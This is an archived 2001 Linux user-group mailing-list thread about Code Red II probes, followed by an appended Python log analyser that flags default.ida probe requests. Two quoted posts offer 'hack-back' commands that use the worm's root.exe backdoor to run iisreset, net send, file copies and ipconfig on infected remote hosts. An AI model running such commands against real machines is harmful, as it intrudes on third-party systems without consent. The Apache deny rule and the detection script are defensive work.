[NTLUG:Discuss] @home, Carrollton TX hits on port 80

asenec@senechalle.net asenec at senechalle.net
Sat Aug 11 15:43:04 CDT 2001


We have about 500 servers, many of which were becoming nonresponsive
due to the CR2 probes.  Adding this to httpd.conf file on those
servers running Apache 1.3 or greater worked wonders:  Apache now knows
exactly what to do in response to such a request.


<Files *.ida>
order allow,deny
deny from all
</Files>



Annette

> From discuss-admin at ntlug.org Sat Aug 11 09:23 CDT 2001
> From: "Jack Snodgrass" <idiotboy at cybermail.net>
> To: <discuss at ntlug.org>
> Subject: Re: [NTLUG:Discuss] @home, Carrollton TX hits on port 80
> Date: Sat, 11 Aug 2001 09:21:06 -0500
> 
> I don't think that this will work.
> 
> I tried it, but lynx called from apache has problems.
> It complains that there is no terminal associated with the lynx process.
> 
> I'm using wget -o /dev/null now instead. It might work... but might not.
> 
> I tried to access several servers that tried to infect my server but they
> were all busy. None of them were accepting connections. In order for this
> to work, they would have to accept the connection and run the root.exe.
> 
> I also used:
> 
> /usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?
> /c+net+send+%2A+Machine+%25COMPUTERNAME%25+has+been+infected+by+the+Code+
> Red+II+worm+and+attacked+my+server"
> 
> /usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?
> /c+net+send+%2A+Please+see+http://www.cert.org/advisories/CA-2001-23.html+
> and+fix+this+server+ASAP."
> 
> /usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?
> /c+explorer+http://www.myservername.net/code_red_worm.html"
> 
> /usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/root.exe?
> /c+copy+c:\winnt\system32\ipconfig.exe+."
> 
> /usr/bin/wget -T 60 -o /dev/null "http://$REMOTE_ADDR/scripts/ipconfig.exe?+
> /release"
> 
> (I added the line breaks) and so far, no boxes have tried to access my
> http://www.myservername.net/code_red_worm.html
> page. Either I'm doing something wrong... or I think.... the servers
> just don't respond to the messages now.
> 
> I guess I could try and run this later when they are less busy infecting
> other machines.
> 
> 
> jack
> 
> 
> 
> ----- Original Message -----
> From: "Michael Collins" <mhtexcollins at austin.rr.com>
> To: <discuss at ntlug.org>
> Sent: Friday, August 10, 2001 9:20 PM
> Subject: Re: [NTLUG:Discuss] @home, Carrollton TX hits on port 80
> 
> 
> > Saw this on alt.os.linux.slackware...thought you guys might be interested.
> >
> > Open httpd.conf and add:
> > AddType text/html .ida
> > AddHandler server-parsed .ida
> >
> > Restart apache with
> > /var/lib/apache/sbin/apachectl restart
> >
> > Create the file /var/lib/apache/htdocs/default.ida with the following
> > line:
> > <!--#exec cmd="lynx -source
> > http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"-->
> >
> > Then sit back and watch the bastard machines shut themselves down.
> >
> > Note: This will not work on the original Code Red. That's the one that
> > displays a string of "N" characters instead of "X" characters.
> >
> > J. Jentink wrote:
> > > I am getting about 20 hits an hour right now over my @home cable in
> > > Carrollton.
> > > From my web log, the following are the last few hitters: IP and
> > > reverse DNS lookup
> > >
> > > When I did the reverse DNS on my own IP, it maps to the form..
> > >     c*******-a.croltn1.tx.home.com
> > > Looks like I am getting hammered by the @home folks on the west
> > > coast... California, Washington and Oregon.
> > >
> > > My RD light on the cable modem also blinks constantly. I just
> > > disconnect it when I am not using the internet. What fun.
> > >
> > > j.
> > >
> > >
> > >
> > > _______________________________________________
> > > http://www.ntlug.org/mailman/listinfo/discuss
> > >
> > >
> >
> >
> >
> > --
> > Michael H. Collins              Admiral: Penguinista Navy International
> > http://www.linuxlink.com        Migration
> > Free Linux Email                http://www.78704.com
> > A great geek girl mp3           http://24.28.86.53
> > This Ain't California http://geekaustin.com/
> >
> >
> 
> 

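Added example (not part of the thread or any poster's code): a small Apache access-log analyser that picks out the default.ida probes Annette's <Files *.ida> block is meant to deny, tells the original Code Red from Code Red II by the "N" versus "X" filler Michael mentions, and tallies probes per source host and per hour. The log lines are constructed samples in Apache common log format, using documentation IP ranges rather than addresses from the thread.

```python
import re
from collections import Counter

# Apache common log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+'
)
# Code Red variants probe /default.ida with a long run of filler characters in
# the query string: 'N' for the original Code Red, 'X' for Code Red II. Real
# probes carry ~224 filler characters; 8 or more is enough to match the shape.
PROBE_RE = re.compile(r'^(?:GET|HEAD) /default\.ida\?(?P<fill>[NX]{8,})')

def classify(request):
    """Return 'CodeRed', 'CodeRedII' or None for one request line."""
    m = PROBE_RE.match(request)
    if not m:
        return None
    return "CodeRed" if m.group("fill")[0] == "N" else "CodeRedII"

def summarize(lines):
    """Tally .ida probes by variant, by source host and by hour of the timestamp."""
    by_variant, by_host, by_hour = Counter(), Counter(), Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip anything that is not common/combined log format
        variant = classify(m.group("req"))
        if variant is None:
            continue
        by_variant[variant] += 1
        by_host[m.group("host")] += 1
        by_hour[m.group("time")[:14]] += 1  # e.g. '11/Aug/2001:09'
    return by_variant, by_host, by_hour

# Constructed sample log lines (not taken from the thread); documentation IPs.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Aug/2001:09:02:11 -0500] "GET /default.ida?XXXXXXXXXXXX%u9090%u6858%ucbd3 HTTP/1.0" 404 285',
    '192.0.2.10 - - [11/Aug/2001:09:40:53 -0500] "GET /default.ida?XXXXXXXXXXXX%u9090%u6858%ucbd3 HTTP/1.0" 404 285',
    '198.51.100.7 - - [11/Aug/2001:09:55:02 -0500] "GET /default.ida?NNNNNNNNNNNN%u9090%u6858%ucbd3 HTTP/1.0" 404 285',
    '203.0.113.5 - - [11/Aug/2001:10:01:44 -0500] "GET /index.html HTTP/1.0" 200 1043',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    variants, hosts, hours = summarize(SAMPLE_LOG)
    print(dict(variants)); print(dict(hosts)); print(dict(hours))
```

Once the deny rule is in place the probes still appear in the access log, only with a 403 status, so the same script keeps working as a per-hour activity gauge.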

